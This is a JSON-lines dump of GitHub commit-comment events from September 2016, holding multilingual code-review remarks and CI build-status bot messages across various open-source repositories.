{"id":"4593208943","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19106094,"position":null,"line":null,"path":null,"commit_id":"a5ac2b4e5857398fdb7d7ffe4cf9d2dd133d3e0e","created_at":"2016-09-20T23:49:06Z","updated_at":"2016-09-20T23:49:06Z","body":"**[unitTests_php_contractual_responsibilities run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_contractual_responsibilities/8336/testReport/) for this commit**"}},"created_at":"2016-09-20T23:49:06Z"}
{"id":"4593215897","type":"CommitCommentEvent","actor":{"login":"manleviet"},"repo":{"name":"lvman/contactsapp"},"payload":{"comment":{"id":19106114,"position":null,"line":null,"path":null,"commit_id":"05119147a8bf9e02fa7be6d195666435636fa832","created_at":"2016-09-20T23:51:08Z","updated_at":"2016-09-20T23:51:08Z","body":"Mã nguồn ổn. Tuy nhiên, cần bổ sung một số kỹ thuật cao cấp để mã nguồn ngắn gọn và uyển chuyển hơn:\r\n1. Thuộc tính\r\n2. Đọc và lưu dữ liệu ra tập tin"}},"created_at":"2016-09-20T23:51:08Z"}
{"id":"4593217917","type":"CommitCommentEvent","actor":{"login":"TimSylvester"},"repo":{"name":"TimSylvester/swaggerwcf"},"payload":{"comment":{"id":19106120,"position":null,"line":null,"path":null,"commit_id":"bc254754adbc897737640071400ee428e550f5cc","created_at":"2016-09-20T23:51:44Z","updated_at":"2016-09-20T23:51:44Z","body":"This is pretty ugly, I know, but C# doesn't allow nullable values in attribute parameter lists because they're not \"constant\" (the compiler generates a `new Nullable<T>` even for literals).\r\n\r\nDecimal can't be used directly for similar reasons."}},"created_at":"2016-09-20T23:51:44Z"}
{"id":"4593220322","type":"CommitCommentEvent","actor":{"login":"ronawho"},"repo":{"name":"chapel-lang/chapel"},"payload":{"comment":{"id":19106130,"position":null,"line":null,"path":null,"commit_id":"121463b59c5f83a64e4ff82d9726243e98cb9d2e","created_at":"2016-09-20T23:52:25Z","updated_at":"2016-09-20T23:52:25Z","body":"I think we should add a high level comment to note that this function can be called concurrently and in particular it can be called with non sequential pids"}},"created_at":"2016-09-20T23:52:25Z"}
{"id":"4593223971","type":"CommitCommentEvent","actor":{"login":"lvman"},"repo":{"name":"lvman/contactsapp"},"payload":{"comment":{"id":19106142,"position":null,"line":null,"path":null,"commit_id":"05119147a8bf9e02fa7be6d195666435636fa832","created_at":"2016-09-20T23:53:27Z","updated_at":"2016-09-20T23:53:27Z","body":"@manleviet ok í kiến hay, mình đề nghị cậu kiểm tra thêm độ dài của chuỗi ký tự trong thuộc tính."}},"created_at":"2016-09-20T23:53:27Z"}
{"id":"4593224197","type":"CommitCommentEvent","actor":{"login":"gschmidt-usgs"},"repo":{"name":"USGS-EROS/espa-l2qa-tools"},"payload":{"comment":{"id":19106143,"position":null,"line":null,"path":null,"commit_id":"db63c36a9cf759a08d05c72fc81a32186036e852","created_at":"2016-09-20T23:53:31Z","updated_at":"2016-09-20T23:53:31Z","body":"Changes look good."}},"created_at":"2016-09-20T23:53:31Z"}
{"id":"4593225692","type":"CommitCommentEvent","actor":{"login":"ronawho"},"repo":{"name":"chapel-lang/chapel"},"payload":{"comment":{"id":19106149,"position":39,"line":66,"path":"runtime/src/chpl-privatization.c","commit_id":"121463b59c5f83a64e4ff82d9726243e98cb9d2e","created_at":"2016-09-20T23:53:57Z","updated_at":"2016-09-20T23:53:57Z","body":"`>=` for consistency?"}},"created_at":"2016-09-20T23:53:57Z"}
{"id":"4593227012","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106154,"position":12,"line":12,"path":"Assignment_2_Vacuum_Cleaner/world/Environment.java","commit_id":"3e6c5b14f1fa6e2e8de23687a9f530cd7e54cf59","created_at":"2016-09-20T23:54:19Z","updated_at":"2016-09-20T23:54:19Z","body":"Nice phrasing here. 👍  Vars - space - methods."}},"created_at":"2016-09-20T23:54:19Z"}
{"id":"4593232367","type":"CommitCommentEvent","actor":{"login":"ronawho"},"repo":{"name":"chapel-lang/chapel"},"payload":{"comment":{"id":19106169,"position":29,"line":57,"path":"runtime/src/chpl-privatization.c","commit_id":"121463b59c5f83a64e4ff82d9726243e98cb9d2e","created_at":"2016-09-20T23:55:52Z","updated_at":"2016-09-20T23:55:52Z","body":"I'm thinking we should add a static inline `max` function above, just to simplify this code since it's confusing enough"}},"created_at":"2016-09-20T23:55:52Z"}
{"id":"4593232484","type":"CommitCommentEvent","actor":{"login":"zpao"},"repo":{"name":"facebook/react"},"payload":{"comment":{"id":19106170,"position":22,"line":22,"path":"scripts/babel/transform-object-assign-require.js","commit_id":"1573baaee8ba1c9cd84145b01effcb5eb80503fb","created_at":"2016-09-20T23:55:53Z","updated_at":"2016-09-20T23:55:53Z","body":"That's a pretty esoteric setup but still surprising (I wouldn't expect the packager to walk up the directory beyond the symlink - .babelrc isn't in build/*). Feel free to do something in the packager but I don't think there's anything for us to do in React."}},"created_at":"2016-09-20T23:55:53Z"}
{"id":"4593238315","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106183,"position":24,"line":24,"path":"Assignment_2_Vacuum_Cleaner/world/Environment.java","commit_id":"3e6c5b14f1fa6e2e8de23687a9f530cd7e54cf59","created_at":"2016-09-20T23:57:40Z","updated_at":"2016-09-20T23:57:40Z","body":"If you find yourself making comments about a chunk of code within a method body, extract it out into a well named helper method. In this case `void buildEnvironment()` would seem to work."}},"created_at":"2016-09-20T23:57:40Z"}
{"id":"4593238385","type":"CommitCommentEvent","actor":{"login":"yinghe616"},"repo":{"name":"EGP-CIG-REU/aspect"},"payload":{"comment":{"id":19106184,"position":null,"line":null,"path":null,"commit_id":"417bea8a6d1682057b2c94b18b1cb05533eceb33","created_at":"2016-09-20T23:57:40Z","updated_at":"2016-09-20T23:57:40Z","body":"@hlokavarapu , can you commit your test example, and tell me the instruction on how to run it?"}},"created_at":"2016-09-20T23:57:40Z"}
{"id":"4593238929","type":"CommitCommentEvent","actor":{"login":"youle31"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":19106186,"position":null,"line":null,"path":null,"commit_id":"ba0a447d9cbc2f86b3efd40f9eb25e4947bd6673","created_at":"2016-09-20T23:57:50Z","updated_at":"2016-09-20T23:57:50Z","body":"If in one case the material has 2 uvs and in other case the material has only one uv, should we consider the material as a new material that has also to be converted? http://pasteall.org/80618/diff\r\n\r\nThe problem with this method is that we have more materials so it generates a performance decrease in some files... Or could we assign a new name chosen by us to the uv in blenderdataconversion when the number of layers is different for the same polymat? (I didn't tried yet)"}},"created_at":"2016-09-20T23:57:50Z"}
{"id":"4593239759","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106188,"position":31,"line":31,"path":"Assignment_2_Vacuum_Cleaner/world/Environment.java","commit_id":"3e6c5b14f1fa6e2e8de23687a9f530cd7e54cf59","created_at":"2016-09-20T23:58:08Z","updated_at":"2016-09-20T23:58:08Z","body":"Same comment as the previous one. `void buildObstacles()`"}},"created_at":"2016-09-20T23:58:08Z"}
{"id":"4593239966","type":"CommitCommentEvent","actor":{"login":"gentlecat"},"repo":{"name":"metabrainz/office"},"payload":{"comment":{"id":19106189,"position":null,"line":null,"path":null,"commit_id":"f8f6d7df89a8da75d5f68c4d87d58184d8c39f14","created_at":"2016-09-20T23:58:11Z","updated_at":"2016-09-20T23:58:11Z","body":"👍 "}},"created_at":"2016-09-20T23:58:11Z"}
{"id":"4593242530","type":"CommitCommentEvent","actor":{"login":"manleviet"},"repo":{"name":"lvman/contactsapp"},"payload":{"comment":{"id":19106193,"position":null,"line":null,"path":null,"commit_id":"05119147a8bf9e02fa7be6d195666435636fa832","created_at":"2016-09-20T23:59:00Z","updated_at":"2016-09-20T23:59:00Z","body":"@lvman Bạn hãy tạo Project, tạo các issue và gán người xử lý đi"}},"created_at":"2016-09-20T23:59:00Z"}
{"id":"4593244703","type":"CommitCommentEvent","actor":{"login":"lvman"},"repo":{"name":"lvman/contactsapp"},"payload":{"comment":{"id":19106200,"position":null,"line":null,"path":null,"commit_id":"05119147a8bf9e02fa7be6d195666435636fa832","created_at":"2016-09-20T23:59:41Z","updated_at":"2016-09-20T23:59:41Z","body":"ok"}},"created_at":"2016-09-20T23:59:41Z"}
{"id":"4593244761","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106201,"position":58,"line":58,"path":"Assignment_2_Vacuum_Cleaner/world/Environment.java","commit_id":"3e6c5b14f1fa6e2e8de23687a9f530cd7e54cf59","created_at":"2016-09-20T23:59:42Z","updated_at":"2016-09-20T23:59:42Z","body":"The name of this method is ambiguous. What's it doing, removing dirty tiles?\r\n\r\nAlso, the casing is not consistent w/ your other methods. Change it to `removeDirt()` or whatever you decide to change the name to."}},"created_at":"2016-09-20T23:59:42Z"}
{"id":"4587193537","type":"CommitCommentEvent","actor":{"login":"amico8"},"repo":{"name":"amico8/seed_sns"},"payload":{"comment":{"id":19089632,"position":10,"line":10,"path":"login.php","commit_id":"4ee2b5a323bfcb7aa10d91702d954137f83810b6","created_at":"2016-09-20T03:00:44Z","updated_at":"2016-09-20T03:00:44Z","body":"まだパスワードにsha1()使ってない"}},"created_at":"2016-09-20T03:00:44Z"}
{"id":"4587196174","type":"CommitCommentEvent","actor":{"login":"whera"},"repo":{"name":"PHPSC/phpsc.github.io"},"payload":{"comment":{"id":19089642,"position":3,"line":3,"path":"js/meetup.js","commit_id":"201dd955ba52008aac4dc08a534d1fcb67643d7b","created_at":"2016-09-20T03:01:40Z","updated_at":"2016-09-20T03:01:40Z","body":"Pode deixar!!!! amanha se sobrar um tempo eu mando pra alguém o repo."}},"created_at":"2016-09-20T03:01:40Z"}
{"id":"4587197339","type":"CommitCommentEvent","actor":{"login":"dennyfricia0"},"repo":{"name":"Dennysantics/amanda-pearce"},"payload":{"comment":{"id":19089648,"position":63,"line":63,"path":"javascripts/respond.js","commit_id":"4695302a463cfaf47fb9fa20d37fc15ec296f44e","created_at":"2016-09-20T03:02:07Z","updated_at":"2016-09-20T03:02:07Z","body":"git remote add origin https://github.com/Dennysantics/amanda-pearce.git\r\ngit push -u origin master"}},"created_at":"2016-09-20T03:02:07Z"}
{"id":"4587205688","type":"CommitCommentEvent","actor":{"login":"RyanTG"},"repo":{"name":"scottwainstock/pbm"},"payload":{"comment":{"id":19089671,"position":null,"line":null,"path":null,"commit_id":"a67fa09123d5c47b7409107732904e3e0db2460f","created_at":"2016-09-20T03:04:55Z","updated_at":"2016-09-20T03:04:55Z","body":"Sweet!"}},"created_at":"2016-09-20T03:04:55Z"}
{"id":"4587205934","type":"CommitCommentEvent","actor":{"login":"kamcio96"},"repo":{"name":"GlowstoneMC/Glowstone"},"payload":{"comment":{"id":19089672,"position":null,"line":null,"path":null,"commit_id":"b1b26234680816f66cc28ed0cd85771264be0a4d","created_at":"2016-09-20T03:05:01Z","updated_at":"2016-09-20T03:05:01Z","body":"```return uuidCache.get(playerName);```"}},"created_at":"2016-09-20T03:05:01Z"}
{"id":"4587206244","type":"CommitCommentEvent","actor":{"login":"yslin2015"},"repo":{"name":"yslin2015/yslin.github.io"},"payload":{"comment":{"id":19089674,"position":null,"line":null,"path":null,"commit_id":"10e204c95453e21928b31dec4355d63ff891c318","created_at":"2016-09-20T03:05:09Z","updated_at":"2016-09-20T03:05:09Z","body":"终端提交"}},"created_at":"2016-09-20T03:05:09Z"}
{"id":"4587208954","type":"CommitCommentEvent","actor":{"login":"fredy314"},"repo":{"name":"molotoksoftware/auction"},"payload":{"comment":{"id":19089683,"position":171,"line":0,"path":"common/models/BalanceHistory.php","commit_id":"57c74f419a462eecd9b3c2dc199189a7997ecb03","created_at":"2016-09-20T03:06:12Z","updated_at":"2016-09-20T03:06:12Z","body":"Пропустил STATUS_REFERAL."}},"created_at":"2016-09-20T03:06:12Z"}
{"id":"4587209105","type":"CommitCommentEvent","actor":{"login":"yslin2015"},"repo":{"name":"yslin2015/yslin.github.io"},"payload":{"comment":{"id":19089685,"position":null,"line":null,"path":null,"commit_id":"10e204c95453e21928b31dec4355d63ff891c318","created_at":"2016-09-20T03:06:15Z","updated_at":"2016-09-20T03:06:15Z","body":"这个是什么commit"}},"created_at":"2016-09-20T03:06:15Z"}
{"id":"4587211205","type":"CommitCommentEvent","actor":{"login":"githublinpeng"},"repo":{"name":"githublinpeng/test"},"payload":{"comment":{"id":19089692,"position":null,"line":null,"path":null,"commit_id":"52a3908aa9a1e288efeaa73da2f3e65b395b5f21","created_at":"2016-09-20T03:06:59Z","updated_at":"2016-09-20T03:06:59Z","body":"test"}},"created_at":"2016-09-20T03:06:59Z"}
{"id":"4587211439","type":"CommitCommentEvent","actor":{"login":"githublinpeng"},"repo":{"name":"githublinpeng/test"},"payload":{"comment":{"id":19089695,"position":null,"line":null,"path":null,"commit_id":"52a3908aa9a1e288efeaa73da2f3e65b395b5f21","created_at":"2016-09-20T03:07:04Z","updated_at":"2016-09-20T03:07:04Z","body":"1111"}},"created_at":"2016-09-20T03:07:04Z"}
{"id":"4587214082","type":"CommitCommentEvent","actor":{"login":"rtlanceroad"},"repo":{"name":"6c37/crux-ports"},"payload":{"comment":{"id":19089712,"position":null,"line":null,"path":null,"commit_id":"358e309bdb9ab01d7aea786b29d608a21033915c","created_at":"2016-09-20T03:08:09Z","updated_at":"2016-09-20T03:08:09Z","body":"I fix it in 539ed22657dd91e46d2577a40ae23a54f63ba167 , following @onodera-punpun 's idea."}},"created_at":"2016-09-20T03:08:09Z"}
{"id":"4587215020","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19089716,"position":null,"line":null,"path":null,"commit_id":"8f031955eb692d33084225fc5e864ca0b2c70354","created_at":"2016-09-20T03:08:31Z","updated_at":"2016-09-20T03:08:31Z","body":"develop (mjwitte) - x86_64-MacOS-10.9-clang: OK (1764 of 1764 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8f031955eb692d33084225fc5e864ca0b2c70354-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8f031955eb692d33084225fc5e864ca0b2c70354-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-20T03:08:31Z"}
{"id":"4587217899","type":"CommitCommentEvent","actor":{"login":"fredy314"},"repo":{"name":"molotoksoftware/auction"},"payload":{"comment":{"id":19089724,"position":144,"line":0,"path":"common/models/BalanceHistory.php","commit_id":"57c74f419a462eecd9b3c2dc199189a7997ecb03","created_at":"2016-09-20T03:09:41Z","updated_at":"2016-09-20T03:09:41Z","body":"Дублирование кода. Это уже есть в функции getSummaWithIcoType и там это сделано правильнее. В своем комите я использовап ее"}},"created_at":"2016-09-20T03:09:41Z"}
{"id":"4587219449","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19089727,"position":null,"line":null,"path":null,"commit_id":"fa4d61cdd0a6ab31952d733460fe924e79891157","created_at":"2016-09-20T03:10:13Z","updated_at":"2016-09-20T03:10:13Z","body":"Sizing-Simple-Chilled-Ceiling (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1765 of 1766 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.89%25-green.svg)</a>\n"}},"created_at":"2016-09-20T03:10:13Z"}
{"id":"4587223242","type":"CommitCommentEvent","actor":{"login":"kamcio96"},"repo":{"name":"GlowstoneMC/Glowstone"},"payload":{"comment":{"id":19089734,"position":null,"line":null,"path":null,"commit_id":"b1b26234680816f66cc28ed0cd85771264be0a4d","created_at":"2016-09-20T03:11:43Z","updated_at":"2016-09-20T03:11:43Z","body":"it's impossible to get async uuid data and return it same sync tick. Mean returning value (It is possible, but pointless). We should add special method with profile callback, it should be called sync or not"}},"created_at":"2016-09-20T03:11:43Z"}
{"id":"4587224540","type":"CommitCommentEvent","actor":{"login":"thanglenguyen"},"repo":{"name":"thanglenguyen/esp8266_thingspeak_homeautomation"},"payload":{"comment":{"id":19089736,"position":null,"line":null,"path":null,"commit_id":"6eb57781699d8515611084e3bc7b59d0e126d9fa","created_at":"2016-09-20T03:12:12Z","updated_at":"2016-09-20T03:12:12Z","body":"With your kind of application, I'd suggest as following:\r\n\r\nFirst thing first, you have to make sure that your ESP is able to connect to your network. Google or Youtube for tuts. There are plenty guideline out there. I would suggest searching for keywords 'ESP8266 with Arduino'.\r\n\r\nThen, the easiest way, I think, is turning your ESP to small Server for keeping listening request from Client (Browser or Phone Application) to turn on/off or toggle the LED.\r\n\r\nNo need to concern about ThingSpeak expect you want to control your LED remotely (i.e. Turn your LED on/off in SF from NY city :-D)."}},"created_at":"2016-09-20T03:12:12Z"}
{"id":"4587224868","type":"CommitCommentEvent","actor":{"login":"mastercoms"},"repo":{"name":"GlowstoneMC/Glowstone"},"payload":{"comment":{"id":19089737,"position":null,"line":null,"path":null,"commit_id":"b1b26234680816f66cc28ed0cd85771264be0a4d","created_at":"2016-09-20T03:12:19Z","updated_at":"2016-09-20T03:12:19Z","body":"We just store uuid and then return stored value, while also putting it in cache."}},"created_at":"2016-09-20T03:12:19Z"}
{"id":"4587225590","type":"CommitCommentEvent","actor":{"login":"fredy314"},"repo":{"name":"molotoksoftware/auction"},"payload":{"comment":{"id":19089739,"position":171,"line":0,"path":"common/models/BalanceHistory.php","commit_id":"57c74f419a462eecd9b3c2dc199189a7997ecb03","created_at":"2016-09-20T03:12:35Z","updated_at":"2016-09-20T03:12:35Z","body":"Может стоит сразу использовать локализацию? Я так сделал в fc1de2a . Вы не видели мой коммит?"}},"created_at":"2016-09-20T03:12:35Z"}
{"id":"4587228574","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19089744,"position":null,"line":null,"path":null,"commit_id":"fa4d61cdd0a6ab31952d733460fe924e79891157","created_at":"2016-09-20T03:13:47Z","updated_at":"2016-09-20T03:13:47Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-20T03:13:47Z"}
{"id":"4587231542","type":"CommitCommentEvent","actor":{"login":"gordianknot1981"},"repo":{"name":"gordianknot1981/weboverride_sample"},"payload":{"comment":{"id":19089746,"position":null,"line":null,"path":null,"commit_id":"352d2ca7b50b9193787a1734e230c7256720859b","created_at":"2016-09-20T03:14:58Z","updated_at":"2016-09-20T03:14:58Z","body":";"}},"created_at":"2016-09-20T03:14:58Z"}
{"id":"4587231743","type":"CommitCommentEvent","actor":{"login":"alexitosrv"},"repo":{"name":"alexitosrv/at"},"payload":{"comment":{"id":19089747,"position":null,"line":null,"path":null,"commit_id":"c2f161d2c8c6a0755f97c1be7e380c9335c89ceb","created_at":"2016-09-20T03:15:02Z","updated_at":"2016-09-20T03:15:02Z","body":"No, my invitation expired so I could not keep trying. This implementation only solves 6 out of 10 test cases."}},"created_at":"2016-09-20T03:15:02Z"}
{"id":"4587233478","type":"CommitCommentEvent","actor":{"login":"johann8384"},"repo":{"name":"johann8384/opentsdb"},"payload":{"comment":{"id":19089751,"position":null,"line":null,"path":null,"commit_id":"4ecf77852356e907700290e204bcb746bbb5ff15","created_at":"2016-09-20T03:15:40Z","updated_at":"2016-09-20T03:15:40Z","body":"I use this with the following command:\r\n\r\n```rm -rf ./build/docker; rm ./build/tsdb*.jar; ./build.sh; docker stop opentsdb; docker rm opentsdb; tools/docker/docker.sh && docker run --name opentsdb --add-host zookeeper:`ifconfig | grep inet | grep 192 | awk '{print $2}' | head -n 1`  -t -i -d -v /Users/jcreasy/code/opentsdb/src/opentsdb.conf:/etc/opentsdb/opentsdb.conf -p 4244:4244 perspicaio/opentsdb && docker logs -f opentsdb```"}},"created_at":"2016-09-20T03:15:40Z"}
{"id":"4587235174","type":"CommitCommentEvent","actor":{"login":"kamcio96"},"repo":{"name":"GlowstoneMC/Glowstone"},"payload":{"comment":{"id":19089763,"position":null,"line":null,"path":null,"commit_id":"b1b26234680816f66cc28ed0cd85771264be0a4d","created_at":"2016-09-20T03:16:19Z","updated_at":"2016-09-20T03:16:19Z","body":"no, separated thread will store value after get it by the read that call method "}},"created_at":"2016-09-20T03:16:19Z"}
{"id":"4587238346","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19089778,"position":null,"line":null,"path":null,"commit_id":"fa4d61cdd0a6ab31952d733460fe924e79891157","created_at":"2016-09-20T03:17:37Z","updated_at":"2016-09-20T03:17:37Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (1783 of 1783 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-20T03:17:37Z"}
{"id":"4587238426","type":"CommitCommentEvent","actor":{"login":"mthomsonbrown"},"repo":{"name":"mthomsonbrown/saplyn_android"},"payload":{"comment":{"id":19089779,"position":null,"line":null,"path":null,"commit_id":"ed2d4cc57df5c6f8a3e21c2ebf6533a5cb3f1c11","created_at":"2016-09-20T03:17:38Z","updated_at":"2016-09-20T03:17:38Z","body":"No idea"}},"created_at":"2016-09-20T03:17:38Z"}
{"id":"4587240862","type":"CommitCommentEvent","actor":{"login":"axic"},"repo":{"name":"ethereum/go-ethereum"},"payload":{"comment":{"id":19089782,"position":9,"line":33,"path":"contracts/chequebook/contract/chequebook.sol","commit_id":"7b884e0075cba9033dadf2d8ed0bf092193d2ae5","created_at":"2016-09-20T03:18:31Z","updated_at":"2016-09-20T03:18:31Z","body":"I think you're sending 0 here :)"}},"created_at":"2016-09-20T03:18:31Z"}
{"id":"4587240938","type":"CommitCommentEvent","actor":{"login":"FE-ZSJ"},"repo":{"name":"FE-ZSJ/HelloWorld"},"payload":{"comment":{"id":19089783,"position":null,"line":null,"path":null,"commit_id":"69e595db211cba19e307ceb831a29be314021964","created_at":"2016-09-20T03:18:33Z","updated_at":"2016-09-20T03:18:33Z","body":"start"}},"created_at":"2016-09-20T03:18:33Z"}
{"id":"4587243936","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19089790,"position":null,"line":null,"path":null,"commit_id":"8359918cc9c224d4fe2d0f8fcdc7d7aa18b62554","created_at":"2016-09-20T03:19:47Z","updated_at":"2016-09-20T03:19:47Z","body":"os_2_0_develop (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8359918cc9c224d4fe2d0f8fcdc7d7aa18b62554-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8359918cc9c224d4fe2d0f8fcdc7d7aa18b62554-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-20T03:19:47Z"}
{"id":"4587244986","type":"CommitCommentEvent","actor":{"login":"MrCTX"},"repo":{"name":"MrCTX/MrCrepository"},"payload":{"comment":{"id":19089798,"position":null,"line":null,"path":null,"commit_id":"d3d8e45ac003677242daa8cd0a5e1928fbdb95cd","created_at":"2016-09-20T03:20:10Z","updated_at":"2016-09-20T03:20:10Z","body":"I do this agin"}},"created_at":"2016-09-20T03:20:10Z"}
{"id":"4587246999","type":"CommitCommentEvent","actor":{"login":"seemantk"},"repo":{"name":"sul-cidr/josquin-ribbon"},"payload":{"comment":{"id":19089801,"position":null,"line":null,"path":null,"commit_id":"195819bd542ba9765f8e8e8cc07569ff09d8fd76","created_at":"2016-09-20T03:20:54Z","updated_at":"2016-09-20T03:20:54Z","body":"Note: Nav moved below focus, closing #35 "}},"created_at":"2016-09-20T03:20:54Z"}
{"id":"4587248243","type":"CommitCommentEvent","actor":{"login":"jmramos02"},"repo":{"name":"zendesk/magento_extension"},"payload":{"comment":{"id":19089804,"position":null,"line":null,"path":null,"commit_id":"b2b58ec799cd603320ac0c70af0471b029f44a59","created_at":"2016-09-20T03:21:23Z","updated_at":"2016-09-20T03:21:23Z","body":"👍 "}},"created_at":"2016-09-20T03:21:23Z"}
{"id":"4587251518","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/XMLTV-Import"},"payload":{"comment":{"id":19089819,"position":null,"line":null,"path":null,"commit_id":"88ca59a3aa3857a3c950fcf2d193d319869a9db8","created_at":"2016-09-20T03:22:45Z","updated_at":"2016-09-20T03:22:45Z","body":"https://github.com/oe-alliance/XMLTV-Import/commit/cee77c2de587d06a3b853d0511c07fbbfba658b9\r\n"}},"created_at":"2016-09-20T03:22:45Z"}
{"id":"4587252565","type":"CommitCommentEvent","actor":{"login":"zhongsp"},"repo":{"name":"CVBDL/EagleEye-App"},"payload":{"comment":{"id":19089823,"position":null,"line":null,"path":null,"commit_id":"73cf998d9fd4e49d3ba0c2900b15e50b861a8bc4","created_at":"2016-09-20T03:23:12Z","updated_at":"2016-09-20T03:23:12Z","body":"#33 "}},"created_at":"2016-09-20T03:23:12Z"}
{"id":"4587258795","type":"CommitCommentEvent","actor":{"login":"IronsDu"},"repo":{"name":"IronsDu/DServerFramework"},"payload":{"comment":{"id":19089846,"position":null,"line":null,"path":null,"commit_id":"da8d56f44be493a7ed6c4e06091e9113334f52a1","created_at":"2016-09-20T03:25:47Z","updated_at":"2016-09-20T03:25:47Z","body":"去掉网关上客户端网络对象和逻辑对象分离的设计（而是直接只使用网络对象）。\r\n即现在：网关服务器在检测客户端掉线时，玩家会话即可消失，而不是继续保持之前设计的逻辑对象）\r\n因为，这样在设计断线重连时才更简洁（由后端服务器去保持真正的游戏逻辑对象，且以玩家uid或name为key，而不是依赖网关上玩家逻辑对象的RuntimeID）。"}},"created_at":"2016-09-20T03:25:47Z"}
{"id":"4587260918","type":"CommitCommentEvent","actor":{"login":"HungtenaZhao"},"repo":{"name":"HungtenaZhao/MachineLearning"},"payload":{"comment":{"id":19089850,"position":null,"line":null,"path":null,"commit_id":"c00fffc77470ab40e42a67b84140d868a0dcf055","created_at":"2016-09-20T03:26:39Z","updated_at":"2016-09-20T03:26:39Z","body":"where is my read-me help"}},"created_at":"2016-09-20T03:26:39Z"}
{"id":"4587269663","type":"CommitCommentEvent","actor":{"login":"mastercoms"},"repo":{"name":"GlowstoneMC/Glowstone"},"payload":{"comment":{"id":19089872,"position":null,"line":null,"path":null,"commit_id":"b1b26234680816f66cc28ed0cd85771264be0a4d","created_at":"2016-09-20T03:30:08Z","updated_at":"2016-09-20T03:30:08Z","body":"I am just explaining something that can be used until we get a callback method ready. Also, I'm not sure exacting what you're saying."}},"created_at":"2016-09-20T03:30:08Z"}
{"id":"4587271154","type":"CommitCommentEvent","actor":{"login":"lickx"},"repo":{"name":"lickx/opencollar-os"},"payload":{"comment":{"id":19089874,"position":null,"line":null,"path":null,"commit_id":"8f955392fe53d4da045870e93df15386b3ce5935","created_at":"2016-09-20T03:30:42Z","updated_at":"2016-09-20T03:30:42Z","body":"CHANGED_OWNER is seriously flakey in OpenSim. This commit is a work around."}},"created_at":"2016-09-20T03:30:42Z"}
